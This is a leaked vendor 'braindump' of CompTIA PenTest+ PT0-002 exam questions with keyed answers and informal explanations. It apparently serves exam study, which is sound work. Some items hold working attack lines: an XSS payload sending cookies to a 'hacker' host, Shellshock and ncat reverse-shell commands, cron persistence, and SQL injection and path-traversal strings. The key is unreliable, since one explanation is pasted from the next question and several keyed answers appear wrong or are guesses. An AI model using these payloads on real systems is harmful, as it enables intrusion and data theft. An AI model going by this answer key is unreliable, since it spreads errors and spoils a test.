PT0-002 Exam Q&A.pdf
Document Details
Uploaded by BonnyVictory6815
2011
CompTIA
Tags
Full Transcript
Copyright © 2006-2011 Lead2pass.com , All Rights Reserved. Vendor: CompTIA Exam Code: PT0-002 Exam Name: CompTIA PenTest+ Exam: PT0-002 Exam Version: 23.031 Important Notice Product Our Product Manager keeps an eye for Exam updates by Vendors. Free update is available within 150 days after your...
Copyright © 2006-2011 Lead2pass.com , All Rights Reserved. Vendor: CompTIA Exam Code: PT0-002 Exam Name: CompTIA PenTest+ Exam: PT0-002 Exam Version: 23.031 Important Notice Product Our Product Manager keeps an eye for Exam updates by Vendors. Free update is available within 150 days after your purchase. You can login member center and download the latest product anytime. (Product downloaded from member center is always the latest.) PS: Ensure you can pass the exam, please check the latest product in 2-3 days before the exam again. Feedback We devote to promote the product quality and the grade of service to ensure customers interest. If you have any suggestions, please feel free to contact us at [email protected] If you have any questions about our product, please provide Exam Number, Version, Page Number, Question Number, and your Login Account to us, please contact us at [email protected] and our technical experts will provide support in 24 hours. Copyright The product of each order has its own encryption code, so you should use it independently. If anyone who share the file we will disable the free update and account access. Any unauthorized changes will be inflicted legal punishment. We will reserve the right of final explanation for this statement. Order ID: **************** PayPal Name: **************** PayPal ID: **************** QUESTION 1 Given the following code: var+img=new+Image();img.src="http://hacker/%20+%20document.cook ie; Which of the following are the BEST methods to prevent against this type of attack? (Choose two.) A. Web-application firewall B. Parameterized queries C. Output encoding D. Session tokens E. Input validation F. Base64 encoding Answer: CE Explanation: Encoding (commonly called “Output Encoding”) involves translating special characters into some different but equivalent form that is no longer dangerous in the target interpreter, for example translating the < character into the < string when writing to an HTML page. Output encoding and input sanitization are the best defenses against XSS. QUESTION 2 A penetration tester who is doing a security assessment discovers that a critical vulnerability is being actively exploited by cybercriminals. Which of the following should the tester do NEXT? A. Reach out to the primary point of contact B. Try to take down the attackers C. Call law enforcement officials immediately D. Collect the proper evidence and add to the final report Answer: A Explanation: When an active exploitation is noticed during the engagement, everything thing else MUST be put on hold and contact the client immediately. QUESTION 3 A penetration tester has identified several newly released CVEs on a VoIP call manager. The scanning tool the tester used determined the possible presence of the CVEs based off the version number of the service. Which of the following methods would BEST support validation of the possible findings? A. Manually check the version number of the VoIP service against the CVE release B. Test with proof-of-concept code from an exploit database C. Review SIP traffic from an on-path position to look for indicators of compromise D. Utilize an nmap -sV scan against the service Answer: B Explanation: No better validation than a POC. Get Latest & Actual PT0-002 Exam's Question and Answers from Lead2pass. 2 https://www.lead2pass.com QUESTION 4 A penetration tester is scanning a corporate lab network for potentially vulnerable services. Which of the following Nmap commands will return vulnerable ports that might be interesting to a potential attacker? A. nmap 192.168.1.1-5 -PU22-25,80 B. nmap 192.168.1.1-5 -PA22-25,80 C. nmap 192.168.1.1-5 -PS22-25,80 D. nmap 192.168.1.1-5 -Ss22-25,80 Answer: C Explanation: PS/PA/PU/PY are host discovery flags which use TCP SYN/ACK, UDP or SCTP discovery respectively. And since the ports in the options are mostly used by TCP protocols, then it's either the PS or PA flag. But since we need to know if the ports are live, sending SYN packet is a better alternative. QUESTION 5 A software development team is concerned that a new product's 64-bit Windows binaries can be deconstructed to the underlying code. Which of the following tools can a penetration tester utilize to help the team gauge what an attacker might see in the binaries? A. Immunity Debugger B. OllyDbg C. GDB D. Drozer Answer: B Explanation: https://en.wikipedia.org/wiki/OllyDbg QUESTION 6 A mail service company has hired a penetration tester to conduct an enumeration of all user accounts on an SMTP server to identify whether previous staff member accounts are still active. Which of the following commands should be used to accomplish the goal? A. VRFY and EXPN B. VRFY and TURN C. EXPN and TURN D. RCPT TO and VRFY Answer: A Explanation: SMTP servers can also be used for information gathering by connecting to them and using the EXPN and VRFY commands. https://hackerone.com/reports/193314 QUESTION 7 Which of the following tools provides Python classes for interacting with network protocols? Get Latest & Actual PT0-002 Exam's Question and Answers from Lead2pass. 3 https://www.lead2pass.com A. Responder B. Impacket C. Empire D. PowerSploit Answer: B Explanation: https://github.com/SecureAuthCorp/impacket QUESTION 8 A penetration tester has obtained shell access to a Windows host and wants to run a specially crafted binary for later execution using the wmic.exe process call create function. Which of the following OS or filesystem mechanisms is MOST likely to support this objective? A. Alternate data streams B. PowerShell modules C. MP4 steganography D. PsExec Answer: B Explanation: WMI allows scripting languages (such as VBScript or Windows PowerShell) to manage Microsoft Windows personal computers and servers, both locally and remotely. https://en.m.wikipedia.org/wiki/Windows_Management_Instrumentation QUESTION 9 A penetration tester discovers during a recent test that an employee in the accounting department has been making changes to a payment system and redirecting money into a personal bank account. The penetration test was immediately stopped. Which of the following would be the BEST recommendation to prevent this type of activity in the future? A. Enforce mandatory employee vacations B. Implement multifactor authentication C. Install video surveillance equipment in the office D. Encrypt passwords for bank account information Answer: A Explanation: Mandatory Vacations, Job Rotation and Separation Duties are all three Managerial controls that are part of cert scope. Mandatory vacation will reveal the difference in the way money flows because he/she wouldn't be able to keep doing that while off work. QUESTION 10 A penetration tester wants to scan a target network without being detected by the client's IDS. Which of the following scans is MOST likely to avoid detection? A. nmap -p0 -T0 -sS 192.168.1.10 B. nmap -sA -sV --host-timeout 60 192.168.1.10 Get Latest & Actual PT0-002 Exam's Question and Answers from Lead2pass. 4 https://www.lead2pass.com C. nmap -f --badsum 192.168.1.10 D. nmap -A -n 192.168.1.10 Answer: A Explanation: If Nmap is run without the -P0 flag when performing third-party scanning, the source IP address of the attacker’s host performs ICMP and TCP pinging of the target hosts before starting to scan; this can appear in firewall and IDS audit logs of security-conscious organizations. QUESTION 11 Which of the following should a penetration tester do NEXT after identifying that an application being tested has already been compromised with malware? A. Analyze the malware to see what it does. B. Collect the proper evidence and then remove the malware. C. Do a root-cause analysis to find out how the malware got in. D. Remove the malware immediately. E. Stop the assessment and inform the emergency contact. Answer: E Explanation: Standard procedure when you establish an active/current security breach, is to stop the test an inform the Emergency Contact. QUESTION 12 A penetration tester runs the following command on a system: find /-user root -perm -4000 -print 2>/dev/null Which of the following is the tester trying to accomplish? A. Set the SGID on all files in the /directory B. Find the /root directory on the system C. Find files with the SUID bit set D. Find files that were created during exploitation and move them to /dev/null Answer: C Explanation: SUID (Set owner User ID up on execution) is a special type of file permissions given to a file. SUID is defined as giving temporary permissions to a user to run a program/file with the permissions of the file owner rather that the user who runs it. In simple words users will get file owner's permissions as well as owner UID and GID when executing a file/program/command. https://www.linux.com/training-tutorials/what-suid-and-how-set-suid-linuxunix/ QUESTION 13 A penetration tester finds a PHP script used by a web application in an unprotected internal source code repository. After reviewing the code, the tester identifies the following: Get Latest & Actual PT0-002 Exam's Question and Answers from Lead2pass. 5 https://www.lead2pass.com Which of the following tools will help the tester prepare an attack for this scenario? A. Hydra and crunch B. Netcat and cURL C. Burp Suite and DIRB D. Nmap and OWASP ZAP Answer: B Explanation: It’s shell exec, not all web app host databases. Burp is a great tool for enumeration and intercepting http requests but that line of code (shell exec) is telling us we could place a reverse shell, trigger it with curl and receive the incoming connection via net at. QUESTION 14 Which of the following would MOST likely be included in the final report of a static application- security test that was written with a team of application developers as the intended audience? A. Executive summary of the penetration-testing methods used B. Bill of materials including supplies, subcontracts, and costs incurred during assessment C. Quantitative impact assessments given a successful software compromise D. Code context for instances of unsafe type-casting operations Answer: D Explanation: Developers would be interested in knowing the wrong code instances used. QUESTION 15 A penetration tester is looking for a vulnerability that enables attackers to open doors via a specialized TCP service that is used for a physical access control system. The service exists on more than 100 different hosts, so the tester would like to automate the assessment. Identification requires the penetration tester to: Have a full TCP connection Send a "hello" payload Walt for a response Send a string of characters longer than 16 bytes Which of the following approaches would BEST support the objective? A. Run nmap -Pn -sV -script vuln. B. Employ an OpenVAS simple scan against the TCP port of the host. C. Create a script in the Lua language and use it with NSE. D. Perform a credentialed scan with Nessus. Answer: C Explanation: Get Latest & Actual PT0-002 Exam's Question and Answers from Lead2pass. 6 https://www.lead2pass.com The Nmap Scripting Engine (NSE) is one of Nmap's most powerful and flexible features. It allows users to write (and share) simple scripts (using the Lua programming language ) to automate a wide variety of networking tasks. https://nmap.org QUESTION 16 A company is concerned that its cloud VM is vulnerable to a cyberattack and proprietary data may be stolen. A penetration tester determines a vulnerability does exist and exploits the vulnerability by adding a fake VM instance to the IaaS component of the client's VM. Which of the following cloud attacks did the penetration tester MOST likely implement? A. Direct-to-origin B. Cross-site scripting C. Malware injection D. Credential harvesting Answer: D Explanation: Since the Pentester sort cloned the legit cloud VM, looks like this was a ruse to collect credentials from users who would attempt logins into the fake VM thinking it's the collect one. QUESTION 17 A penetration tester needs to perform a test on a finance system that is PCI DSS v3.2.1 compliant. Which of the following is the MINIMUM frequency to complete the scan of the system? A. Weekly B. Monthly C. Quarterly D. Annually Answer: C Explanation: 11.2 Run internal and external network vulnerability scans at least quarterly and after any significant change in the network. Address vulnerabilities and perform rescans as needed, until passing scans are achieved. After passing a scan for initial PCI DSS compliance, an entity must, in subsequent years, complete four consecutive quarters of passing scans. Quarterly external scans must be performed by an Approved Scanning Vendor (ASV). Scans conducted after network changes and internal scans may be performed by internal staff. https://www.pcisecuritystandards.org/documents/PCI_DSS-QRG-v3_2_1.pdf QUESTION 18 A company becomes concerned when the security alarms are triggered during a penetration test. Which of the following should the company do NEXT? A. Halt the penetration test. B. Conduct an incident response. C. Deconflict with the penetration tester. D. Assume the alert is from the penetration test. Answer: C Explanation: Get Latest & Actual PT0-002 Exam's Question and Answers from Lead2pass. 7 https://www.lead2pass.com Since they need to validate with pentester if the pentester triggered alarms or not. QUESTION 19 A penetration tester wants to identify CVEs that can be leveraged to gain execution on a Linux server that has an SSHD running. Which of the following would BEST support this task? A. Run nmap with the -O, -p22, and -sC options set against the target B. Run nmap with the -sV and -p22 options set against the target C. Run nmap with the --script vulners option set against the target D. Run nmap with the -sA option set against the target Answer: A Explanation: It has the ssh port (22) and at the same time, it runs the default scripts (-sC) to check for vulnerabilities. QUESTION 20 A penetration tester logs in as a user in the cloud environment of a company. Which of the following Pacu modules will enable the tester to determine the level of access of the existing user? A. iam_enum_permissions B. iam_privesc_scan C. iam_backdoor_assume_role D. iam_bruteforce_permissions Answer: A Explanation: - iam_enum_permissions--> module extracts the permissions that belong to the entities within the database. https://essay.utwente.nl/76955/1/Szabo_MSc_EEMCS.pdf (37) QUESTION 21 A penetration tester has completed an analysis of the various software products produced by the company under assessment. The tester found that over the past several years the company has been including vulnerable third-party modules in multiple products, even though the quality of the organic code being developed is very good. Which of the following recommendations should the penetration tester include in the report? A. Add a dependency checker into the tool chain. B. Perform routine static and dynamic analysis of committed code. C. Validate API security settings before deployment. D. Perform fuzz testing of compiled binaries. Answer: A Explanation: Regarding Static Code Analysis: https://whatis.techtarget.com/definition/static-analysis-static-code-analysis "Generally, static analysis occurs before software testing in early development." Since our question says "committed code", how can you do a static analysis of committed code? https://www.argon.io/blog/how-to-analyze-the-owasp-dependency-check/ Get Latest & Actual PT0-002 Exam's Question and Answers from Lead2pass. 8 https://www.lead2pass.com QUESTION 22 A penetration tester is testing a web application that is hosted by a public cloud provider. The tester is able to query the provider's metadata and get the credentials used by the instance to authenticate itself. Which of the following vulnerabilities has the tester exploited? A. Cross-site request forgery B. Server-side request forgery C. Remote file inclusion D. Local file inclusion Answer: B Explanation: https://owasp.org/www-community/attacks/Server_Side_Request_Forgery QUESTION 23 When preparing for an engagement with an enterprise organization, which of the following is one of the MOST important items to develop fully prior to beginning the penetration testing activities? A. Clarify the statement of work. B. Obtain an asset inventory from the client. C. Interview all stakeholders. D. Identify all third parties involved. Answer: A QUESTION 24 A red-team tester has been contracted to emulate the threat posed by a malicious insider on a company's network, with the constrained objective of gaining access to sensitive personnel files. During the assessment, the red-team tester identifies an artifact indicating possible prior compromise within the target environment. Which of the following actions should the tester take? A. Perform forensic analysis to isolate the means of compromise and determine attribution. B. Incorporate the newly identified method of compromise into the red team's approach. C. Create a detailed document of findings before continuing with the assessment. D. Halt the assessment and follow the reporting procedures as outlined in the contract. Answer: D QUESTION 25 A penetration tester writes the following script: Get Latest & Actual PT0-002 Exam's Question and Answers from Lead2pass. 9 https://www.lead2pass.com Which of the following objectives is the tester attempting to achieve? A. Determine active hosts on the network. B. Set the TTL of ping packets for stealth. C. Fill the ARP table of the networked devices. D. Scan the system on the most used ports. Answer: A Explanation: Prior to testing in the cloud, the team will need to obtain the proper permissions from the provider and determine what type of testing will be allowed. QUESTION 26 Which of the following should a penetration tester consider FIRST when engaging in a penetration test in a cloud environment? A. Whether the cloud service provider allows the penetration tester to test the environment B. Whether the specific cloud services are being used by the application C. The geographical location where the cloud services are running D. Whether the country where the cloud service is based has any impeding laws Answer: A Explanation: Prior to testing in the cloud, the team will need to obtain the proper permissions from the provider and determine what type of testing will be allowed. QUESTION 27 A penetration tester who is conducting a web-application test discovers a clickjacking vulnerability associated with a login page to financial data. Which of the following should the tester do with this information to make this a successful exploit? A. Perform XSS. B. Conduct a watering-hole attack. C. Use BeEF. D. Use browser autopwn. Answer: A Explanation: https://www.acunetix.com/blog/articles/clickjacking-blind-xss/ QUESTION 28 A company that requires minimal disruption to its daily activities needs a penetration tester to perform information gathering around the company's web presence. Which of the following would the tester find MOST helpful in the initial information-gathering steps? (Choose two.) A. IP addresses and subdomains B. Zone transfers C. DNS forward and reverse lookups D. Internet search engines Get Latest & Actual PT0-002 Exam's Question and Answers from Lead2pass. 10 https://www.lead2pass.com E. Externally facing open ports F. Shodan results Answer: DF QUESTION 29 A penetration tester discovers that a web server within the scope of the engagement has already been compromised with a backdoor. Which of the following should the penetration tester do NEXT? A. Forensically acquire the backdoor Trojan and perform attribution B. Utilize the backdoor in support of the engagement C. Continue the engagement and include the backdoor finding in the final report D. Inform the customer immediately about the backdoor Answer: D Explanation: When it comes to finding prior attacks always inform the client. QUESTION 30 Which of the following are the MOST important items to include in the final report for a penetration test? (Choose two.) A. The CVSS score of the finding B. The network location of the vulnerable device C. The vulnerability identifier D. The client acceptance form E. The name of the person who found the flaw F. The tool used to find the issue Answer: BC Explanation: In Comptia certmaster states: Conclusion: This section wraps up the report. It should include a general summary statement about failures and successes, with supporting evidence that can be written in a sentence or two. It should also include a statement of the PenTest goals and whether those goals were met. You can get more specific about potential attacks and what assets such an attack could leverage. Identify the areas that are most likely to be compromised and recommend that those be dealt with as soon as possible. QUESTION 31 A penetration tester performs the following command: curl -I -http2 https://www.comptia.org Which of the following snippets of output will the tester MOST likely receive? Get Latest & Actual PT0-002 Exam's Question and Answers from Lead2pass. 11 https://www.lead2pass.com A. B. C. D. [########################################################] 100% Answer: A Explanation: https://research.securitum.com/http-2-protocol-it-is-faster-but-is-it-also-safer/ QUESTION 32 A penetration tester runs the unshadow command on a machine. Which of the following tools will the tester most likely use NEXT? A. John the Ripper B. Hydra C. Mimikatz D. Cain and Abel Answer: A Explanation: The unshadow command will basically combine the data of /etc/passwd and /etc/shadow to create 1 file with username and password details for John The Ripper tool. QUESTION 33 A penetration tester has been hired to configure and conduct authenticated scans of all the servers on a software company's network. Which of the following accounts should the tester use to return the MOST results? A. Root user B. Local administrator C. Service Get Latest & Actual PT0-002 Exam's Question and Answers from Lead2pass. 12 https://www.lead2pass.com D. Network administrator Answer: C Explanation: Service accounts are a special type of non-human privileged account used to execute applications and run automated services, virtual machine instances, and other processes. Service accounts can be privileged local or domain accounts, and in some cases, they may have domain administrative privileges. https://www.beyondtrust.com/blog/entry/how-to-manage-and-secure-service-accounts-best- practices QUESTION 34 In an unprotected network file repository, a penetration tester discovers a text file containing usernames and passwords in cleartext and a spreadsheet containing data for 50 employees, including full names, roles, and serial numbers. The tester realizes some of the passwords in the text file follow the format:. Which of the following would be the best action for the tester to take NEXT with this information? A. Create a custom password dictionary as preparation for password spray testing. B. Recommend using a password manage/vault instead of text files to store passwords securely. C. Recommend configuring password complexity rules in all the systems and applications. D. Document the unprotected file repository as a finding in the penetration-testing report. Answer: D QUESTION 35 Which of the following is the MOST effective person to validate results from a penetration test? A. Third party B. Team leader C. Chief Information Officer D. Client Answer: B Explanation: If the Team Leader is the Pentesters Team Leader, then I feel they would be the best person to validate the results of a pentest, prior to presenting them to the Client or CIO. QUESTION 36 A penetration tester is working on a scoping document with a new client. The methodology the client uses includes the following: Pre-engagement interaction (scoping and ROE) Intelligence gathering (reconnaissance) Threat modeling Vulnerability analysis Exploitation and post exploitation Reporting Which of the following methodologies does the client use? Get Latest & Actual PT0-002 Exam's Question and Answers from Lead2pass. 13 https://www.lead2pass.com A. OWASP Web Security Testing Guide B. PTES technical guidelines C. NIST SP 800-115 D. OSSTMM Answer: B Explanation: https://kirkpatrickprice.com/blog/stages-of-penetration-testing-according-to-ptes/ QUESTION 37 A penetration tester ran an Nmap scan on an Internet-facing network device with the -F option and found a few open ports. To further enumerate, the tester ran another scan using the following command: nmap -O -A -sS -p- 100.100.100.50 Nmap returned that all 65,535 ports were filtered. Which of the following MOST likely occurred on the second scan? A. A firewall or IPS blocked the scan. B. The penetration tester used unsupported flags. C. The edge network device was disconnected. D. The scan returned ICMP echo replies. Answer: A Explanation: https://phoenixnap.com/kb/nmap-scan-open-ports QUESTION 38 A penetration tester exploited a unique flaw on a recent penetration test of a bank. After the test was completed, the tester posted information about the exploit online along with the IP addresses of the exploited machines. Which of the following documents could hold the penetration tester accountable for this action? A. ROE B. SLA C. MSA D. NDA Answer: D Explanation: A non disclosure agreement (NDA) could protect the client. QUESTION 39 A client has requested that the penetration test scan include the following UDP services: SNMP, NetBIOS, and DNS. Which of the following Nmap commands will perform the scan? A. nmap -vv sUV -p 53, 123-159 10.10.1.20/24 -oA udpscan B. nmap -vv sUV -p 53,123,161-162 10.10.1.20/24 -oA udpscan C. nmap -vv sUV -p 53,137-139,161-162 10.10.1.20/24 -oA udpscan Get Latest & Actual PT0-002 Exam's Question and Answers from Lead2pass. 14 https://www.lead2pass.com D. nmap -vv sUV -p 53, 122-123, 160-161 10.10.1.20/24 -oA udpscan Answer: C Explanation: NetBios ports: 37, 138, and 139. SNMP port: 161 DNS: 53 QUESTION 40 A penetration tester who is conducting a vulnerability assessment discovers that ICMP is disabled on a network segment. Which of the following could be used for a denial-of-service attack on the network segment? A. Smurf B. Ping flood C. Fraggle D. Ping of death Answer: C Explanation: A Fraggle Attack is a denial-of-service (DoS) attack that involves sending a large amount of spoofed UDP traffic to a router’s broadcast address within a network. It is very similar to a Smurf Attack, which uses spoofed ICMP traffic rather than UDP traffic to achieve the same goal. Given those routers (as of 1999) no longer forward packets directed at their broadcast addresses, most networks are now immune to Fraggle (and Smurf) attacks. QUESTION 41 Which of the following types of information should be included when writing the remediation section of a penetration test report to be viewed by the systems administrator and technical staff? A. A quick description of the vulnerability and a high-level control to fix it B. Information regarding the business impact if compromised C. The executive summary and information regarding the testing company D. The rules of engagement from the assessment Answer: A Explanation: The systems administrator and the technical stuff would be more interested in the technical aspect of the findings. QUESTION 42 A penetration tester discovers a vulnerable web server at 10.10.1.1. The tester then edits a Python script that sends a web exploit and comes across the following code: exploits = {"User-Agent": "() { ignored;};/bin/bash -i>& /dev/tcp/127.0.0.1/9090 0>&1", "Accept": "text/html,application/xhtml+xml,application/xml"} Which of the following edits should the tester make to the script to determine the user context in which the server is being run? Get Latest & Actual PT0-002 Exam's Question and Answers from Lead2pass. 15 https://www.lead2pass.com A. exploits = {"User-Agent": "() { ignored;};/bin/bash -i id;whoami", "Accept": "text/html,application/xhtml+xml,application/xml"} B. exploits = {"User-Agent": "() { ignored;};/bin/bash -i>& find /-perm -4000", "Accept": "text/html,application/xhtml+xml,application/xml"} C. exploits = {"User-Agent": "() { ignored;};/bin/sh -i ps -ef" 0>&1", "Accept": "text/html,application/xhtml+xml,application/xml"} D. exploits = {"User-Agent": "() { ignored;};/bin/bash -i>& /dev/tcp/10.10.1.1/80" 0>&1", "Accept": "text/html,application/xhtml+xml,application/xml"} Answer: A Explanation: It directly returns output regarding the user. QUESTION 43 Which of the following provides a matrix of common tactics and techniques used by attackers along with recommended mitigations? A. NIST SP 800-53 B. OWASP Top 10 C. MITRE ATT&CK framework D. PTES technical guidelines Answer: C Explanation: https://digitalguardian.com/blog/what-mitre-attck-framework QUESTION 44 Which of the following should a penetration tester attack to gain control of the state in the HTTP protocol after the user is logged in? A. HTTPS communication B. Public and private keys C. Password encryption D. Sessions and cookies Answer: D QUESTION 45 A software company has hired a penetration tester to perform a penetration test on a database server. The tester has been given a variety of tools used by the company's privacy policy. Which of the following would be the BEST to use to find vulnerabilities on this server? A. OpenVAS B. Nikto C. SQLmap D. Nessus Answer: C Explanation: It's a database server SQLmap would be the preferred tool. Get Latest & Actual PT0-002 Exam's Question and Answers from Lead2pass. 16 https://www.lead2pass.com https://phoenixnap.com/blog/best-penetration-testing-tools QUESTION 46 A penetration tester was able to gain access successfully to a Windows workstation on a mobile client's laptop. Which of the following can be used to ensure the tester is able to maintain access to the system? A. schtasks /create /sc /ONSTART /tr C:\Temp\WindowsUpdate.exe B. wmic startup get caption,command C. crontab -l; echo "@reboot sleep 200 && ncat -lvp 4242 -e /bin/bash") | crontab 2>/dev/null D. sudo useradd -ou 0 -g 0 user Answer: A Explanation: Window - should be schtasks. Crontab in Linux. QUESTION 47 A large client wants a penetration tester to scan for devices within its network that are Internet facing. The client is specifically looking for Cisco devices with no authentication requirements. Which of the following settings in Shodan would meet the client's requirements? A. "cisco-ios" "admin+1234" B. "cisco-ios" "no-password" C. "cisco-ios" "default-passwords" D. "cisco-ios" "last-modified" Answer: B Explanation: "no authentication requirements" This is easily no password pointing to B. QUESTION 48 A tester who is performing a penetration test on a website receives the following output: Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /var/www/search.php on line 62 Which of the following commands can be used to further attack the website? A. var adr= `../evil.php?test=' + escape(document.cookie); B.../../../../../../../../../../etc/passwd C. /var/www/html/index.php;whoami D. 1 UNION SELECT 1, DATABASE(),3-- Answer: D Explanation: The website is prone to a SQL injection attack as it appears to be taking the user input directly. QUESTION 49 A penetration tester conducted a vulnerability scan against a client's critical servers and found the following: Get Latest & Actual PT0-002 Exam's Question and Answers from Lead2pass. 17 https://www.lead2pass.com Which of the following would be a recommendation for remediation? A. Deploy a user training program B. Implement a patch management plan C. Utilize the secure software development life cycle D. Configure access controls on each of the servers Answer: B QUESTION 50 A company that developers embedded software for the automobile industry has hired a penetration-testing team to evaluate the security of its products prior to delivery. The penetration- testing team has stated its intent to subcontract to a reverse-engineering team capable of analyzing binaries to develop proof-of-concept exploits. The software company has requested additional background investigations on the reverse-engineering team prior to approval of the subcontract. Which of the following concerns would BEST support the software company's request? A. The reverse-engineering team may have a history of selling exploits to third parties. B. The reverse-engineering team may use closed-source or other non-public information feeds for its analysis. C. The reverse-engineering team may not instill safety protocols sufficient for the automobile industry. D. The reverse-engineering team will be given access to source code for analysis. Answer: A Explanation: The penetration testers have the intention of creating exploits, so obviously exploits are going to be the concern in this scenario no doubt about that. QUESTION 51 A penetration tester has been given eight business hours to gain access to a client's financial system. Which of the following techniques will have the highest likelihood of success? A. Attempting to tailgate an employee going into the client's workplace B. Dropping a malicious USB key with the company's logo in the parking lot C. Using a brute-force attack against the external perimeter to gain a foothold D. Performing spear phishing against employees by posing as senior management Answer: D Explanation: With Brute force attacks, the likely hood of locking accounts is high given the time span assigned for the hack to be done. Get Latest & Actual PT0-002 Exam's Question and Answers from Lead2pass. 18 https://www.lead2pass.com QUESTION 52 The results of an Nmap scan are as follows: Which of the following would be the BEST conclusion about this device? A. This device may be vulnerable to the Heartbleed bug due to the way transactions over TCP/22 handle heartbeat extension packets, allowing attackers to obtain sensitive information from process memory. B. This device is most likely a gateway with in-band management services. C. This device is most likely a proxy server forwarding requests over TCP/443. D. This device may be vulnerable to remote code execution because of a butter overflow vulnerability in the method used to extract DNS names from packets prior to DNSSEC validation. Answer: B Explanation: The heartbleed bug is an openssl bug which does not affect SSH. https://www.sos-berlin.com/en/news-heartbleed-bug-does-not-affect-jobscheduler-or-ssh QUESTION 53 Which of the following BEST describes why a client would hold a lessons-learned meeting with the penetration-testing team? A. To provide feedback on the report structure and recommend improvements B. To discuss the findings and dispute any false positives C. To determine any processes that failed to meet expectations during the assessment D. To ensure the penetration-testing team destroys all company data that was gathered during the test Answer: C Explanation: When you debrief within the penetration test team, you are likely to uncover things that did or did not work well. You can use this information to influence how you conduct future tests. The primary goal of drafting a lessons learned report (LLR) or after-action report (AAR) is to improve your PenTest processes and tools. QUESTION 54 A penetration tester who is performing a physical assessment of a company's security practices notices the company does not have any shredders inside the office building. Which of the following techniques would be BEST to use to gain confidential information? Get Latest & Actual PT0-002 Exam's Question and Answers from Lead2pass. 19 https://www.lead2pass.com A. Badge cloning B. Dumpster diving C. Tailgating D. Shoulder surfing Answer: B QUESTION 55 A company is concerned that its cloud service provider is not adequately protecting the VMs housing its software development. The VMs are housed in a datacenter with other companies sharing physical resources. Which of the following attack types is MOST concerning to the company? A. Data flooding B. Session riding C. Cybersquatting D. Side channel Answer: D Explanation: Cross-VM Cache Side Channel Attacks make it Vulnerable: One of the most sophisticated forms of attack is the cross-VM cache side channel attack that exploits shared cache memory between VMs. A cache side channel attack results in side channel data leakage, such as cryptographic keys. In cases where there exist shared hardware resources, the side channel attack exploits information obtained from the usage of, for example, Central Processing Unit (CPU) core and high level cache memory as opposed to exploiting theoretical weaknesses like the brute force attack. Ref: https://arxiv.org/pdf/1606.01356.pdf QUESTION 56 SIMULATION You are a penetration tester reviewing a client’s website through a web browser. INSTRUCTIONS Review all components of the website through the browser to determine if vulnerabilities are present. Remediate ONLY the highest vulnerability from either the certificate, source, or cookies. If at any time you would like to bring back the initial state of the simulation, please click the Reset All button. Get Latest & Actual PT0-002 Exam's Question and Answers from Lead2pass. 20 https://www.lead2pass.com Get Latest & Actual PT0-002 Exam's Question and Answers from Lead2pass. 21 https://www.lead2pass.com Get Latest & Actual PT0-002 Exam's Question and Answers from Lead2pass. 22 https://www.lead2pass.com Get Latest & Actual PT0-002 Exam's Question and Answers from Lead2pass. 23 https://www.lead2pass.com Answer: Step 1 - Generate a Certificate Signing Request Step 2 - Submit CSR to the CA Step 3 - Install re-issued certificate on the server Step 4 - Remove Certificate from Server QUESTION 57 Hotspot Question Instructions: Given the following attack signatures, determine the attack type, and then identify the associated remediation to prevent the attack in the future. If at any time you would like to bring back the initial state of the simulation, please click the Reset All button. You are a security analyst tasked with hardening a web server. You have been given a list of HTTP payloads that were flagged as malicious. Get Latest & Actual PT0-002 Exam's Question and Answers from Lead2pass. 24 https://www.lead2pass.com Answer: Get Latest & Actual PT0-002 Exam's Question and Answers from Lead2pass. 25 https://www.lead2pass.com Explanation: 1. Dom XSS - input san. https://portswigger.net/web-security/cross-site-scripting/dom-based 2. SQLi Stacked - Parameterized Queries Get Latest & Actual PT0-002 Exam's Question and Answers from Lead2pass. 26 https://www.lead2pass.com 3. SQLi Union - Parameterized Queries 4. Reflected XSS - input san https://portswigger.net/web-security/cross-site-scripting/reflected 5. SQLi Error - Parameterized Queries https://www.indusface.com/blog/types-of-sql- injection/#Error_Based_SQL_Injection 6. CMD Injection - Input San. /,\ Sandbox 7. URL Redirect - Prevent ext. calls 8. local file inclusion - Input san. /,\ Sandbox 9. CMD Injection - input san. [,],(,) 10. Remote File Inclusion - input san. /,\ Sandbox QUESTION 58 SIMULATION You are a penetration tester running port scans on a server. INSTRUCTIONS Part1: Given the output, construct the command that was used to generate this output from the available options. Part2: Once the command is appropriately constructed, use the given output to identify the potential attack vectors that should be investigated further. If at any time you would like to bring back the initial state of the simulation, please click the Reset All button. Part1 Get Latest & Actual PT0-002 Exam's Question and Answers from Lead2pass. 27 https://www.lead2pass.com Part2 Get Latest & Actual PT0-002 Exam's Question and Answers from Lead2pass. 28 https://www.lead2pass.com Answer: Part 1 – nmap -sV -O --top-ports=100 192.168.2.2 Tried scanning 1 host on my machine. Without -sV you will not get question marks in your port services. We can also clearly see only 100 ports are being scanned. Commander123 is correct. Part 2 – Null session enumeration Looking at the output you can see ports 139 and 445 are opened. This is wide open for a Null session attack. QUESTION 59 A client wants a security assessment company to perform a penetration test against its hot site. The purpose of the test is to determine the effectiveness of the defenses that protect against disruptions to business continuity. Which of the following is the MOST important action to take before starting this type of assessment? A. Ensure the client has signed the SOW. B. Verify the client has granted network access to the hot site. C. Determine if the failover environment relies on resources not owned by the client. D. Establish communication and escalation procedures with the client. Answer: A Explanation: You need to make sure the contract is signed before anything is started. QUESTION 60 Performing a penetration test against an environment with SCADA devices brings an additional safety risk because the: A. devices produce more heat and consume more power. B. devices are obsolete and are no longer available for replacement. C. protocols are more difficult to understand. D. devices may cause physical world effects. Answer: D Explanation: The question asks about the safety risk. Difficult to understand protocols don't threaten safety like the aspect of physical world effects like causing floods or gas line ruptures. QUESTION 61 Which of the following documents describes specific activities, deliverables, and schedules for a penetration tester? A. NDA B. MSA C. SOW D. MOU Answer: C Explanation: Get Latest & Actual PT0-002 Exam's Question and Answers from Lead2pass. 29 https://www.lead2pass.com The SOW is the only document that offers a scope of what the Pentester is going to do. QUESTION 62 A company hired a penetration-testing team to review the cyber-physical systems in a manufacturing plant. The team immediately discovered the supervisory systems and PLCs are both connected to the company intranet. Which of the following assumptions, if made by the penetration-testing team, is MOST likely to be valid? A. PLCs will not act upon commands injected over the network. B. Supervisors and controllers are on a separate virtual network by default. C. Controllers will not validate the origin of commands. D. Supervisory systems will detect a malicious injection of code/commands. Answer: C Explanation: PLC is a programmable logic controller. These are essentially maleable devices in that they can be controlled/manipulated/coded/programed to do whatever you need them to do for a business. They most likely lack ability to self-regulate/correct. This usually is the role of a security/network engineer. If one is able to send code to one of these devices, more likely than not, it will be accepted unless compensating controls have been put in place by an admin. this is my best guess. C makes the most sense to me for these reasons. QUESTION 63 A new security firm is onboarding its first client. The client only allowed testing over the weekend and needed the results Monday morning. However, the assessment team was not able to access the environment as expected until Monday. Which of the following should 